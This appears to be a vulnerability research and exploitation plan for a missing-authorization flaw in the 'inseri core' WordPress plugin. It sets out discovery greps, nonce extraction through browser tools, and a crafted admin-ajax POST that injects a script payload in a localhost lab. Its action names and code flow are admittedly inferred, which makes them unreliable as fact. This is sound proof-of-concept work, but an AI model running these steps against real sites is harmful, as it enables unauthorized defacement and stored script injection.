Scientific and Interactive Blocks – inseri core <= 1.0.5 - Missing Authorization

This research plan outlines the steps to identify and exploit the Missing Authorization vulnerability (CVE-2026-27344) in the Scientific and Interactive Blocks – inseri core plugin.

---

1. Vulnerability Summary

The Scientific and Interactive Blocks – inseri core plugin (up to version 1.0.5) fails to implement proper authorization checks (e.g., current_user_can()) on one or more of its AJAX or REST API handlers. Specifically, functions registered under wp_ajax_nopriv_* or REST routes with permissive permission_callback values allow unauthenticated attackers to perform actions intended for administrators or editors, such as creating, modifying, or deleting interactive blocks/items.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php (AJAX) or /wp-json/inseri-core/v1/... (REST API).
• Vulnerable Action (Inferred): Likely an action related to "saving" or "updating" block data. Based on the plugin structure, candidate actions include inseri_core_save_item, inseri_core_create_item, or a REST route like POST /wp-json/inseri-core/v1/items.
• Payload Parameters: item_id (int), content (string/JSON), and potentially a nonce.
• Preconditions: The plugin must be active. If a nonce is required, a page containing an inseri block must be accessible to extract the nonce.

3. Code Flow (Inferred)

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=[ACTION_NAME].
2. Hook Registration: The plugin registers the action:
   add_action( 'wp_ajax_nopriv_[ACTION_NAME]', 'handle_unauthorized_action' );
   (or fails to provide a permission_callback in a REST route).
3. Vulnerable Function: The handler function handle_unauthorized_action executes.
4. Authorization Failure: The function lacks a current_user_can('edit_posts') or current_user_can('manage_options') check.
5. Sink: The function proceeds to call wp_update_post(), update_post_meta(), or a direct $wpdb query to modify site content.

4. Nonce Acquisition Strategy

If the handler uses check_ajax_referer or wp_verify_nonce, the nonce is likely localized for the frontend editor or interactive blocks.

1. Identify Shortcode: Locate the primary shortcode (likely [inseri-item]) or the block registration in the source.
2. Create Trigger Page: Use WP-CLI to create a page containing the block:

   wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='<!-- wp:inseri-core/item {"id":1} /-->'
   

3. Extract Nonce: Use browser_navigate to visit the page and browser_eval to extract the localized nonce.
   • Candidate JS Variables: window.inseri_core_vars?.nonce or window.inseri_core_data?.ajax_nonce.
   • Action String: Check the source for wp_create_nonce('...') to identify the correct action key.

5. Exploitation Strategy

This plan assumes the vulnerability allows unauthorized modification of an "inseri item" (a custom post type or meta entry).

Step 1: Discovery
Search the plugin directory to find the specific vulnerable action:

grep -rn "wp_ajax_nopriv" .
grep -rn "register_rest_route" . -A 5

Identify handlers that perform write operations (update, delete, save).

Step 2: Nonce Extraction (If Required)
If a nonce is found in the discovery step (e.g., check_ajax_referer( 'inseri_core_nonce' ... )):

1. Navigate to the page created in the "Test Data Setup".
2. Execute: browser_eval("window.inseri_core_vars.nonce").

Step 3: Execution of Unauthorized Action
Send a crafted HTTP request to modify a block's content:

• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=[DISCOVERED_ACTION]&nonce=[EXTRACTED_NONCE]&id=[TARGET_ID]&content=<h1>Vulnerable</h1><script>alert(1)</script>
  

6. Test Data Setup

1. Activate Plugin: wp plugin activate inseri-core.
2. Create Target Content: If the plugin uses a custom post type for items, create one:

   wp post create --post_type=inseri_item --post_title="Target Block" --post_content="Original Scientific Data" --post_status=publish
   

3. Identify Target ID: Note the ID of the created post (e.g., 123).

7. Expected Results

• Response: The server returns a 200 OK or a JSON success message (e.g., {"success":true}).
• Impact: The content of the "Scientific Block" (Post ID 123) is modified to include the attacker's payload (e.g., XSS or defacement).

8. Verification Steps

1. Check Post Content: Use WP-CLI to verify the modification:

   wp post get [TARGET_ID] --field=post_content
   

2. Verify UI Change: Navigate to the page where the block is embedded and check for the injected payload.

9. Alternative Approaches

• REST API Route: If an AJAX handler isn't found, check for REST routes at POST /wp-json/inseri-core/v1/items. Test the permission_callback. If it returns __return_true or is missing, the route is publicly accessible.
• Settings Modification: Check if the plugin registers wp_ajax_nopriv_inseri_core_save_settings. If so, try to change plugin-wide configurations or inject malicious scripts into global headers/footers if the plugin provides such features.